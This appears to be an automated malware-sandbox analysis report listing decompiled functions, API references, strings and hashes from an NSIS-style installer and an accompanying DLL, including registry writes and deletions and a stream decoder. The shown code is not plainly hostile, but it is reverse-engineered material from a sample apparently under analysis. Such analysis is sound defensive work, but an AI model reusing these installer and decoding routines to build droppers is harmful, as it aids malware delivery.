                                            • lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                            • lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                            • SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                            • SendMessageA.USER32 ref: 00404F18
                                            • SendMessageA.USER32 ref: 00404F32
                                            • SendMessageA.USER32 ref: 00404F40
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                            • String ID:
                                            • API String ID: 2531174081-0
                                            • Opcode ID: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                                            • Instruction ID: 29716f0e6f05b21b32fe67f81276caf5577c11483a64657c7043e00463a136c9
                                            • Opcode Fuzzy Hash: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                                            • Instruction Fuzzy Hash: 21218EB1900118BBDF119FA5DC849DFBFB9FB44354F10807AF904A6290C7789E418BA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00404753(struct HWND__* _a4, intOrPtr _a8) {
                                            				long _v8;
                                            				signed char _v12;
                                            				unsigned int _v16;
                                            				void* _v20;
                                            				intOrPtr _v24;
                                            				long _v56;
                                            				void* _v60;
                                            				long _t15;
                                            				unsigned int _t19;
                                            				signed int _t25;
                                            				struct HWND__* _t28;
                                            
                                            				_t28 = _a4;
                                            				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                            				if(_a8 == 0) {
                                            					L4:
                                            					_v56 = _t15;
                                            					_v60 = 4;
                                            					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                            					return _v24;
                                            				}
                                            				_t19 = GetMessagePos();
                                            				_v16 = _t19 >> 0x10;
                                            				_v20 = _t19;
                                            				ScreenToClient(_t28,  &_v20);
                                            				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                            				if((_v12 & 0x00000066) != 0) {
                                            					_t15 = _v8;
                                            					goto L4;
                                            				}
                                            				return _t25 | 0xffffffff;
                                            			}















                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Message$Send$ClientScreen
                                            • String ID: f
                                            • API String ID: 41195575-1993550816
                                            • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                            • Instruction ID: b5292072505f589c3e6e61736795eac3e8b5c463abbfbac9e5f2f3c06e421abf
                                            • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                            • Instruction Fuzzy Hash: BE015275D00219BADB00DB94DC45BFEBBBCAB55715F10412BBB10B71C1C7B465418BA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 91%
                                            			E1000CB96(void* __ebx, void* __edi, void* __eflags) {
                                            				void* __esi;
                                            				void* _t3;
                                            				intOrPtr _t6;
                                            				long _t14;
                                            				long* _t27;
                                            
                                            				E10008826(_t3);
                                            				if(E10009FFA() != 0) {
                                            					_t6 = E10009B7B(E1000C978);
                                            					 *0x1001bd90 = _t6;
                                            					__eflags = _t6 - 0xffffffff;
                                            					if(_t6 == 0xffffffff) {
                                            						goto L1;
                                            					} else {
                                            						_t27 = E1000A399(1, 0x3bc);
                                            						__eflags = _t27;
                                            						if(_t27 == 0) {
                                            							L6:
                                            							E1000CC0C();
                                            							__eflags = 0;
                                            							return 0;
                                            						} else {
                                            							__eflags = E10009BD7( *0x1001bd90, _t27);
                                            							if(__eflags == 0) {
                                            								goto L6;
                                            							} else {
                                            								_push(0);
                                            								_push(_t27);
                                            								E1000CAE3(__ebx, __edi, _t27, __eflags);
                                            								_t14 = GetCurrentThreadId();
                                            								_t27[1] = _t27[1] | 0xffffffff;
                                            								 *_t27 = _t14;
                                            								__eflags = 1;
                                            								return 1;
                                            							}
                                            						}
                                            					}
                                            				} else {
                                            					L1:
                                            					E1000CC0C();
                                            					return 0;
                                            				}
                                            			}









                                            APIs
                                            • __init_pointers.LIBCMT ref: 1000CB96
                                              • Part of subcall function 10008826: RtlEncodePointer.NTDLL(00000000,00000001,1000CB9B,10012851,10019380,00000008,10012A19,?,00000001,?,100193A0,0000000C,10012AE9,?,00000001,?), ref: 10008829
                                              • Part of subcall function 10008826: __initp_misc_winsig.LIBCMT ref: 10008844
                                              • Part of subcall function 10008826: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 10009C3C
                                              • Part of subcall function 10008826: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 10009C50
                                              • Part of subcall function 10008826: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 10009C63
                                              • Part of subcall function 10008826: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 10009C76
                                              • Part of subcall function 10008826: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10009C89
                                              • Part of subcall function 10008826: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 10009C9C
                                              • Part of subcall function 10008826: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 10009CAF
                                              • Part of subcall function 10008826: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 10009CC2
                                              • Part of subcall function 10008826: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 10009CD5
                                              • Part of subcall function 10008826: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 10009CE8
                                              • Part of subcall function 10008826: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 10009CFB
                                              • Part of subcall function 10008826: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 10009D0E
                                              • Part of subcall function 10008826: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 10009D21
                                              • Part of subcall function 10008826: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 10009D34
                                              • Part of subcall function 10008826: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 10009D47
                                              • Part of subcall function 10008826: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 10009D5A
                                            • __mtinitlocks.LIBCMT ref: 1000CB9B
                                            • __mtterm.LIBCMT ref: 1000CBA4
                                            • __calloc_crt.LIBCMT ref: 1000CBC9
                                            • __initptd.LIBCMT ref: 1000CBEB
                                            • GetCurrentThreadId.KERNEL32 ref: 1000CBF2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AddressProc$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                            • String ID:
                                            • API String ID: 1593083391-0
                                            • Opcode ID: 18e6203171b5f6703930a5e256d13ae9aa06e9cd8fd6f9546cccf5ed6b71eac2
                                            • Instruction ID: 02d96f7580899f1a259af74a0d0048c593b74cff88c672cacd3a2994c246b3cf
                                            • Opcode Fuzzy Hash: 18e6203171b5f6703930a5e256d13ae9aa06e9cd8fd6f9546cccf5ed6b71eac2
                                            • Instruction Fuzzy Hash: F7F09036519B2A5AF224E774BC47E8A36C0DF022F4B304729F0A9D50EDFF21E9414291
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00402B6E(struct HWND__* _a4, intOrPtr _a8) {
                                            				char _v68;
                                            				int _t11;
                                            				int _t20;
                                            
                                            				if(_a8 == 0x110) {
                                            					SetTimer(_a4, 1, 0xfa, 0);
                                            					_a8 = 0x113;
                                            				}
                                            				if(_a8 == 0x113) {
                                            					_t20 =  *0x40b0d8; // 0x8200
                                            					_t11 =  *0x41f0e8;
                                            					if(_t20 >= _t11) {
                                            						_t20 = _t11;
                                            					}
                                            					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                            					SetWindowTextA(_a4,  &_v68);
                                            					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                            				}
                                            				return 0;
                                            			}







                                            APIs
                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
                                            • MulDiv.KERNEL32(00008200,00000064,?), ref: 00402BB4
                                            • wsprintfA.USER32 ref: 00402BC4
                                            • SetWindowTextA.USER32(?,?), ref: 00402BD4
                                            • SetDlgItemTextA.USER32 ref: 00402BE6
                                            Strings
                                            • verifying installer: %d%%, xrefs: 00402BBE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Text$ItemTimerWindowwsprintf
                                            • String ID: verifying installer: %d%%
                                            • API String ID: 1451636040-82062127
                                            • Opcode ID: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                                            • Instruction ID: c6984150c403b35497dc18a40ce28a5dc8b104db4e9527dfc76b44ca96ff41d6
                                            • Opcode Fuzzy Hash: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                                            • Instruction Fuzzy Hash: 5D01FF70A44208BBEB209F60DD49EEE3769FB04345F008039FA06A92D1D7B5AA558F99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • E8 transform detected; file size %u, xrefs: 1000142A
                                            • setting window to 0x%X, xrefs: 1000134D
                                            • decoding stream of size %u to size %u, starting at %u, xrefs: 1000115F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID:
                                            • String ID: E8 transform detected; file size %u$decoding stream of size %u to size %u, starting at %u$setting window to 0x%X
                                            • API String ID: 0-4286174769
                                            • Opcode ID: 347821c0b590c84ff46a00d1acb6a352d551c073a430cad62b225cf9ebc3db1c
                                            • Instruction ID: 22d4f3012f543e3c1a0865e5157f0e6ad265d6f6b6cc205a56271a634936d0f9
                                            • Opcode Fuzzy Hash: 347821c0b590c84ff46a00d1acb6a352d551c073a430cad62b225cf9ebc3db1c
                                            • Instruction Fuzzy Hash: 78E19FB4904209DFDB04CFA8D590AEEBBF1FF48344F208519E849A7345D775A985CFA2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 85%
                                            			E00402336(void* __eax) {
                                            				void* _t15;
                                            				char* _t18;
                                            				int _t19;
                                            				char _t24;
                                            				int _t27;
                                            				signed int _t30;
                                            				intOrPtr _t35;
                                            				void* _t37;
                                            
                                            				_t15 = E00402B1E(__eax);
                                            				_t35 =  *((intOrPtr*)(_t37 - 0x18));
                                            				 *(_t37 - 0x34) =  *(_t37 - 0x14);
                                            				 *(_t37 - 0x38) = E00402A29(2);
                                            				_t18 = E00402A29(0x11);
                                            				_t30 =  *0x423ff0; // 0x0
                                            				 *(_t37 - 4) = 1;
                                            				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
                                            				if(_t19 == 0) {
                                            					if(_t35 == 1) {
                                            						E00402A29(0x23);
                                            						_t19 = lstrlenA(0x40a410) + 1;
                                            					}
                                            					if(_t35 == 4) {
                                            						_t24 = E00402A0C(3);
                                            						 *0x40a410 = _t24;
                                            						_t19 = _t35;
                                            					}
                                            					if(_t35 == 3) {
                                            						_t19 = E00402E8E( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a410, 0xc00);
                                            					}
                                            					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a410, _t19) == 0) {
                                            						 *(_t37 - 4) = _t27;
                                            					}
                                            					_push( *(_t37 + 8));
                                            					RegCloseKey();
                                            				}
                                            				 *0x423fc8 =  *0x423fc8 +  *(_t37 - 4);
                                            				return 0;
                                            			}












                                            APIs
                                            • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402374
                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsw7E57.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
                                            • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsw7E57.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023CD
                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsw7E57.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: CloseCreateValuelstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\nsw7E57.tmp
                                            • API String ID: 1356686001-1192040905
                                            • Opcode ID: 9bf654010a188213ed9da3fb996897beb0b6485406045e6761b6e0bfc6b57b1d
                                            • Instruction ID: e6eb4e552242eddf296ff96e6d07a7eb6613d299afeb9756830ee7ce8f9eb162
                                            • Opcode Fuzzy Hash: 9bf654010a188213ed9da3fb996897beb0b6485406045e6761b6e0bfc6b57b1d
                                            • Instruction Fuzzy Hash: 7111A271E00108BFEB10EFA5DE8DEAF7678EB40758F10443AF505B31D0C6B85D419A69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 96%
                                            			E1000D05A(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                            				void* _t7;
                                            				long _t8;
                                            				intOrPtr* _t9;
                                            				intOrPtr* _t12;
                                            				long _t20;
                                            				long _t31;
                                            
                                            				if(_a4 != 0) {
                                            					_t31 = _a8;
                                            					__eflags = _t31;
                                            					if(_t31 != 0) {
                                            						_push(__ebx);
                                            						while(1) {
                                            							__eflags = _t31 - 0xffffffe0;
                                            							if(_t31 > 0xffffffe0) {
                                            								break;
                                            							}
                                            							__eflags = _t31;
                                            							if(_t31 == 0) {
                                            								_t31 = _t31 + 1;
                                            								__eflags = _t31;
                                            							}
                                            							_t7 = HeapReAlloc( *0x1001daa0, 0, _a4, _t31);
                                            							_t20 = _t7;
                                            							__eflags = _t20;
                                            							if(_t20 != 0) {
                                            								L17:
                                            								_t8 = _t20;
                                            							} else {
                                            								__eflags =  *0x1001da9c - _t7;
                                            								if(__eflags == 0) {
                                            									_t9 = E1000982A(__eflags);
                                            									 *_t9 = E10009871(GetLastError());
                                            									goto L17;
                                            								} else {
                                            									__eflags = E100097F7(_t7, _t31);
                                            									if(__eflags == 0) {
                                            										_t12 = E1000982A(__eflags);
                                            										 *_t12 = E10009871(GetLastError());
                                            										L12:
                                            										_t8 = 0;
                                            										__eflags = 0;
                                            									} else {
                                            										continue;
                                            									}
                                            								}
                                            							}
                                            							goto L14;
                                            						}
                                            						E100097F7(_t6, _t31);
                                            						 *((intOrPtr*)(E1000982A(__eflags))) = 0xc;
                                            						goto L12;
                                            					} else {
                                            						E1000A31A(_a4);
                                            						_t8 = 0;
                                            					}
                                            					L14:
                                            					return _t8;
                                            				} else {
                                            					return E1000590F(__ebx, __edx, __edi, _a8);
                                            				}
                                            			}










                                            APIs
                                            • _malloc.LIBCMT ref: 1000D066
                                              • Part of subcall function 1000590F: __FF_MSGBANNER.LIBCMT ref: 10005926
                                              • Part of subcall function 1000590F: __NMSG_WRITE.LIBCMT ref: 1000592D
                                              • Part of subcall function 1000590F: RtlAllocateHeap.NTDLL(00630000,00000000,00000001,?,?,?,?,10003D2C), ref: 10005952
                                            • _free.LIBCMT ref: 1000D079
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: AllocateHeap_free_malloc
                                            • String ID:
                                            • API String ID: 1020059152-0
                                            • Opcode ID: 300eb232fee5ff746ea73558d6903992b3e2d68afa41119a1f30a19ee69866a0
                                            • Instruction ID: aae015efdbdb643356a7341ef58f28c8c27676f56bc8a1864c705a4957f3fa6b
                                            • Opcode Fuzzy Hash: 300eb232fee5ff746ea73558d6903992b3e2d68afa41119a1f30a19ee69866a0
                                            • Instruction Fuzzy Hash: 6711A336908226ABFB24FF74AC5574E37D4EF022E0F118527F84C9A198DF31D98297A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 84%
                                            			E00402A69(void* _a4, char* _a8, long _a12) {
                                            				void* _v8;
                                            				char _v272;
                                            				signed char _t16;
                                            				long _t18;
                                            				long _t25;
                                            				intOrPtr* _t27;
                                            				long _t28;
                                            
                                            				_t16 =  *0x423ff0; // 0x0
                                            				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
                                            				if(_t18 == 0) {
                                            					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                            						__eflags = _a12;
                                            						if(_a12 != 0) {
                                            							RegCloseKey(_v8);
                                            							L8:
                                            							__eflags = 1;
                                            							return 1;
                                            						}
                                            						_t25 = E00402A69(_v8,  &_v272, 0);
                                            						__eflags = _t25;
                                            						if(_t25 != 0) {
                                            							break;
                                            						}
                                            					}
                                            					RegCloseKey(_v8);
                                            					_t27 = E00405F28(4);
                                            					if(_t27 == 0) {
                                            						__eflags =  *0x423ff0; // 0x0
                                            						if(__eflags != 0) {
                                            							goto L8;
                                            						}
                                            						_t28 = RegDeleteKeyA(_a4, _a8);
                                            						__eflags = _t28;
                                            						if(_t28 != 0) {
                                            							goto L8;
                                            						}
                                            						return _t28;
                                            					}
                                            					return  *_t27(_a4, _a8,  *0x423ff0, 0);
                                            				}
                                            				return _t18;
                                            			}











                                            APIs
                                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                                            • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                                            • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: Close$DeleteEnumOpen
                                            • String ID:
                                            • API String ID: 1912718029-0
                                            • Opcode ID: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                                            • Instruction ID: fd754328231b90d3809392cacc3778cc58b9849b8c5c25df110c081a09ace752
                                            • Opcode Fuzzy Hash: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                                            • Instruction Fuzzy Hash: 29116D71A0000AFEDF219F90DE49DAE3B79FB14345B104076FA05A00E0DBB89E51AFA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00401CDE(int __edx) {
                                            				void* _t17;
                                            				struct HINSTANCE__* _t21;
                                            				struct HWND__* _t25;
                                            				void* _t27;
                                            
                                            				_t25 = GetDlgItem( *(_t27 - 8), __edx);
                                            				GetClientRect(_t25, _t27 - 0x50);
                                            				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A29(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
                                            				if(_t17 != _t21) {
                                            					DeleteObject(_t17);
                                            				}
                                            				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t27 - 4));
                                            				return 0;
                                            			}








                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                            • String ID:
                                            • API String ID: 1849352358-0
                                            • Opcode ID: b6dc52a7f50dc5a5b8d69a970bc0364d2e288b966cb10631b9234e7e7e1bdde9
                                            • Instruction ID: 6b5de524c76fb4cd20547a313357388a8ed9b6ad8842e2156e420fd608a0a23d
                                            • Opcode Fuzzy Hash: b6dc52a7f50dc5a5b8d69a970bc0364d2e288b966cb10631b9234e7e7e1bdde9
                                            • Instruction Fuzzy Hash: 75F0EC72A04118AFD701EBA4DE88DAFB77CFB44305B14443AF501F6190C7749D019B79
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 77%
                                            			E00404649(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                            				char _v36;
                                            				char _v68;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed int _t21;
                                            				signed int _t22;
                                            				void* _t29;
                                            				void* _t31;
                                            				void* _t32;
                                            				void* _t41;
                                            				signed int _t43;
                                            				signed int _t47;
                                            				signed int _t50;
                                            				signed int _t51;
                                            				signed int _t53;
                                            
                                            				_t21 = _a16;
                                            				_t51 = _a12;
                                            				_t41 = 0xffffffdc;
                                            				if(_t21 == 0) {
                                            					_push(0x14);
                                            					_pop(0);
                                            					_t22 = _t51;
                                            					if(_t51 < 0x100000) {
                                            						_push(0xa);
                                            						_pop(0);
                                            						_t41 = 0xffffffdd;
                                            					}
                                            					if(_t51 < 0x400) {
                                            						_t41 = 0xffffffde;
                                            					}
                                            					if(_t51 < 0xffff3333) {
                                            						_t50 = 0x14;
                                            						asm("cdq");
                                            						_t22 = 1 / _t50 + _t51;
                                            					}
                                            					_t23 = _t22 & 0x00ffffff;
                                            					_t53 = _t22 >> 0;
                                            					_t43 = 0xa;
                                            					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                                            				} else {
                                            					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                                            					_t47 = 0;
                                            				}
                                            				_t29 = E00405BBA(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                                            				_t31 = E00405BBA(_t41, _t47, _t53,  &_v68, _t41);
                                            				_t32 = E00405BBA(_t41, _t47, 0x420538, 0x420538, _a8);
                                            				wsprintfA(_t32 + lstrlenA(0x420538), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                                            				return SetDlgItemTextA( *0x423718, _a4, 0x420538);
                                            			}

                                            APIs
                                            • lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                                            • wsprintfA.USER32 ref: 004046EF
                                            • SetDlgItemTextA.USER32 ref: 00404702
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ItemTextlstrlenwsprintf
                                            • String ID: %u.%u%s%s
                                            • API String ID: 3540041739-3551169577
                                            • Opcode ID: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                                            • Instruction ID: 33c490f36d39f428f4b6feb88c055206d8f5fbd89635bf607d329e374d543c8d
                                            • Opcode Fuzzy Hash: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                                            • Instruction Fuzzy Hash: 5A11D873A0512437EB0065699C41EAF329CDB82335F150637FE26F31D1E9B9DD1145E8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 37%
                                            			E10004140(void* __ebx, void* __edi, char* _a4) {
                                            				signed int _v8;
                                            				signed int _v12;
                                            				char _v13;
                                            				void* _v14;
                                            				signed int _v20;
                                            				intOrPtr _v24;
                                            				char* _v28;
                                            				signed char _t50;
                                            				char* _t54;
                                            				char* _t71;
                                            				char* _t76;
                                            				signed int _t82;
                                            				char** _t90;
                                            
                                            				_v8 = 0;
                                            				_v12 = 0;
                                            				_t71 = _a4;
                                            				_t92 =  *(_t71 + 0x18) & 0x0000000f;
                                            				_t82 = 1;
                                            				_v13 = 1;
                                            				if(( *(_t71 + 0x18) & 0x0000000f) != 0) {
                                            					 *_t90 = L"(dec->bit_pos & 0xF) == 0";
                                            					_v28 = L"Source.c";
                                            					_v24 = 0xaa;
                                            					E10005287(__ebx, 1, __edi, _t92);
                                            					_v13 = 0;
                                            				}
                                            				while(_a4[0x18] != 0) {
                                            					_a4[0x18] = _a4[0x18] - 0x10;
                                            					_v8 = (_a4[0x14] >> _a4[0x18] & 0x0000ffff) << _v12 | _v8;
                                            					_v12 = _v12 + 0x10;
                                            				}
                                            				while(1) {
                                            					__eflags = _v12 - 0x20;
                                            					_v14 = 0;
                                            					if(_v12 < 0x20) {
                                            						_t54 = _a4;
                                            						_t76 = _a4;
                                            						__eflags =  *((intOrPtr*)(_t54 + 4)) + 2 -  *((intOrPtr*)(_t76 + 8));
